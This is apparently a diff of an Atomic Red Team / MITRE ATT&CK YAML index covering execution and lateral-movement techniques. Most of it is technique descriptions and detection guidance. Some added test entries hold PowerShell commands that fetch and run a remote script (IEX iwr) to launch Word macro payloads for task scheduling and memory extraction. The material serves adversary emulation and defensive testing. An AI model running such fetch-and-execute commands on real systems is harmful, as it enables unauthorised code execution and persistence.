+ Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
+
+ Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
+
+ Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
+ name: Native API
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - System calls
+ - Loaded DLLs
+ - API monitoring
+ - Process monitoring
x_mitre_detection: "Monitoring API calls may generate a significant amount of
data and may not be useful for defense unless collected under specific circumstances,
since benign use of API functions are common and difficult to distinguish
@@ -44703,15 +52517,13 @@ execution:
to abnormal/unusual or potentially malicious processes, may indicate abuse
of the Windows API. Though noisy, this data can be combined with other indicators
to identify adversary activity. "
- x_mitre_data_sources:
- - System calls
- - Loaded DLLs
- - API monitoring
- - Process monitoring
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_remote_support: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
identifier: T1106
atomic_tests:
- name: Execution through API - CreateProcess
@@ -44734,8 +52546,83 @@ execution:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
%tmp%/T1106.exe
name: command_prompt
+ T1059.008:
+ technique:
+ id: attack-pattern--818302b2-d640-477b-bf88-873120ce85c4
+ description: "Adversaries may abuse scripting or built-in command line interpreters
+ (CLI) on network devices to execute malicious command and payloads. The CLI
+ is the primary means through which users and administrators interact with
+ the device in order to view system information, modify device operations,
+ or perform diagnostic and administrative functions. CLIs typically contain
+ various permission levels required for different commands. \n\nScripting interpreters
+ automate tasks and extend functionality beyond the command set included in
+ the network OS. The CLI and scripting interpreter are accessible through a
+ direct console connection, or through remote means, such as telnet or secure
+ shell (SSH).\n\nAdversaries can use the network CLI to change how network
+ devices behave and operate. The CLI may be used to manipulate traffic flows
+ to intercept or manipulate data, modify startup configuration parameters to
+ load malicious system software, or to disable security features or logging
+ to avoid detection. (Citation: Cisco Synful Knock Evolution)"
+ name: Network Device CLI
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1059.008
+ url: https://attack.mitre.org/techniques/T1059/008
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Command History
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
+ History. Retrieved October 21, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ modified: '2020-10-22T16:43:38.388Z'
+ created: '2020-10-20T00:09:33.072Z'
+ x_mitre_data_sources:
+ - Network device logs
+ - Network device run-time memory
+ - Network device command history
+ - Network device configuration
+ x_mitre_platforms:
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
+
+ Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ atomic_tests: []
T1059.001:
technique:
+ created: '2020-03-09T13:48:55.078Z'
+ modified: '2020-06-24T13:51:22.360Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
+ description: |-
+ Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
+
+ PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
+
+ A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
+
+ PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
+ name: PowerShell
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1059.001
@@ -44768,37 +52655,10 @@ execution:
description: Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH
POWERSHELL LOGGING. Retrieved February 16, 2016.
source_name: FireEye PowerShell Logging 2016
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: PowerShell
- description: |-
- Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
-
- PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
-
- A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
-
- PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
- id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-06-24T13:51:22.360Z'
- created: '2020-03-09T13:48:55.078Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_remote_support: true
- x_mitre_detection: |-
- If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
-
- Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
-
- It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Praetorian
x_mitre_data_sources:
- Windows event logs
- Process monitoring
@@ -44807,10 +52667,18 @@ execution:
- Loaded DLLs
- File monitoring
- DLL monitoring
- x_mitre_contributors:
- - Praetorian
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
+
+ Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
+
+ It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1059.001
atomic_tests:
- name: Mimikatz
@@ -45474,10 +53342,58 @@ execution:
>$null 2>&1
'
+ - name: Task Scheduler via VBA
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
+ description: |
+ This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+ 30 - 40 seconds after this module has run
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
+ name: powershell
T1053:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:46.977Z'
+ modified: '2020-10-14T15:20:01.069Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scheduled Task/Job
+ description: |-
+ Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
+
+ Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
external_references:
- source_name: mitre-attack
external_id: T1053
@@ -45489,35 +53405,21 @@ execution:
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
source_name: TechNet Task Scheduler Security
- description: |-
- Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
-
- Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
- name: Scheduled Task/Job
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-24T13:45:04.006Z'
- created: '2017-05-31T21:30:46.977Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_remote_support: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -45528,19 +53430,18 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1064:
technique:
@@ -45805,8 +53706,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1072
external_id: T1072
+ url: https://attack.mitre.org/techniques/T1072
+ - external_id: CAPEC-187
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/187.html
description: |-
Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).
@@ -45822,10 +53726,10 @@ execution:
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-02-21T16:31:32.789Z'
+ modified: '2020-09-16T15:27:01.403Z'
created: '2017-05-31T21:30:57.201Z'
x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- Authentication logs
- File monitoring
@@ -45951,6 +53855,73 @@ execution:
- Windows
- macOS
atomic_tests: []
+ T1053.006:
+ technique:
+ id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
+ description: |-
+ Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
+
+ Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
+
+ An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.
+ name: Systemd Timers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1053.006
+ url: https://attack.mitre.org/techniques/T1053/006
+ - source_name: archlinux Systemd Timers Aug 2020
+ url: https://wiki.archlinux.org/index.php/Systemd/Timers
+ description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
+ 12, 2020.
+ - source_name: 'Linux man-pages: systemd January 2014'
+ url: http://man7.org/linux/man-pages/man1/systemd.1.html
+ description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
+ Retrieved April 23, 2019.
+ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
+ AUR Package Repository. Retrieved April 23, 2019.
+ url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
+ source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
+ - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
+ Arch package compromise. Retrieved April 23, 2019.
+ url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
+ source_name: gist Arch package compromise 10JUL2018
+ - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
+ April 23, 2019.
+ url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
+ source_name: acroread package compromised Arch Linux Mail 8JUL2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-14T15:20:00.754Z'
+ created: '2020-10-12T17:50:31.584Z'
+ x_mitre_platforms:
+ - Linux
+ x_mitre_contributors:
+ - SarathKumar Rajendran, Trimble Inc
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
+
+ Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.
+
+ Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1059.004:
technique:
id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
@@ -46095,7 +54066,7 @@ execution:
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
- Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
+ Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
name: Visual Basic
@@ -46118,6 +54089,10 @@ execution:
url: https://docs.microsoft.com/office/vba/api/overview/
description: Microsoft. (2019, June 11). Office VBA Reference. Retrieved June
23, 2020.
+ - source_name: Wikipedia VBA
+ url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
+ description: Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August
+ 13, 2020.
- source_name: Microsoft VBScript
url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March
@@ -46126,7 +54101,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-06-25T03:32:51.046Z'
+ modified: '2020-08-13T20:09:39.122Z'
created: '2020-03-09T14:29:51.508Z'
x_mitre_platforms:
- Windows
@@ -46147,7 +54122,7 @@ execution:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1059.005
atomic_tests:
- name: Visual Basic script execution to gather local computer information
@@ -46210,6 +54185,44 @@ execution:
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
+'
+ name: powershell
+ - name: Extract Memory via VBA
+ auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
+ description: |
+ This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
+ we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
+ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
+ -officeProduct \"Word\" -sub \"Extract\"\n"
+ cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
+ -ErrorAction Ignore
+
'
name: powershell
T1059.003:
@@ -46260,7 +54273,7 @@ execution:
- name: Create and Execute Batch Script
auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388
description: 'Creates and executes a simple batch script. Upon execution, CMD
- will briefly launh to run the batch script then close again.
+ will briefly launch to run the batch script then close again.
'
supported_platforms:
@@ -46482,23 +54495,26 @@ lateral-movement:
- source_name: mitre-attack
external_id: T1550.001
url: https://attack.mitre.org/techniques/T1550/001
+ - external_id: CAPEC-593
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/593.html
- description: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure
APIs. Retrieved September 12, 2019.
url: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
source_name: Auth0 - Why You Should Always Use Access Tokens to Secure APIs
Sept 2019
- - source_name: okta
- url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
- description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
+ - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
September 12, 2019.
- - source_name: Microsoft Identity Platform Access 2019
- url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
- description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
+ url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
+ source_name: okta
+ - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
Microsoft identity platform access tokens. Retrieved October 4, 2019.
- - source_name: Staaldraad Phishing with OAuth 2017
- url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
- description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
+ url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
+ source_name: Microsoft Identity Platform Access 2019
+ - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
Retrieved October 4, 2019.
+ url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
+ source_name: Staaldraad Phishing with OAuth 2017
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -46518,9 +54534,9 @@ lateral-movement:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-23T20:24:52.899Z'
+ modified: '2020-09-16T19:40:02.024Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -46860,13 +54876,13 @@ lateral-movement:
source_name: Trend Micro When Phishing Starts from the Inside 2017
- description: THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved
October 8, 2019.
- url: " https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6 "
+ url: https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6
source_name: THE FINANCIAL TIMES LTD 2019.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-31T22:13:33.718Z'
+ modified: '2020-09-17T18:26:41.796Z'
created: '2019-09-04T19:26:12.441Z'
x_mitre_is_subtechnique: false
x_mitre_data_sources:
@@ -47252,6 +55268,30 @@ lateral-movement:
elevation_required: true
T1021.001:
technique:
+ created: '2020-02-11T18:23:26.059Z'
+ modified: '2020-02-25T19:23:34.204Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ id: attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
+ description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078)
+ to log into a computer using the Remote Desktop Protocol (RDP). The adversary
+ may then perform actions as the logged-on user.\n\nRemote desktop is a common
+ feature in operating systems. It allows a user to log into an interactive
+ session with a system desktop graphical user interface on a remote system.
+ Microsoft refers to its implementation of the Remote Desktop Protocol (RDP)
+ as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
+ \n\nAdversaries may connect to a remote system over RDP/RDS to expand access
+ if the service is enabled and allows access to accounts with known credentials.
+ Adversaries will likely use Credential Access techniques to acquire credentials
+ to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility
+ Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation:
+ Alperovitch Malware)"
+ name: Remote Desktop Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021.001
@@ -47267,51 +55307,27 @@ lateral-movement:
description: Alperovitch, D. (2014, October 31). Malware-Free Intrusions.
Retrieved November 4, 2014.
source_name: Alperovitch Malware
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Desktop Protocol
- description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078)
- to log into a computer using the Remote Desktop Protocol (RDP). The adversary
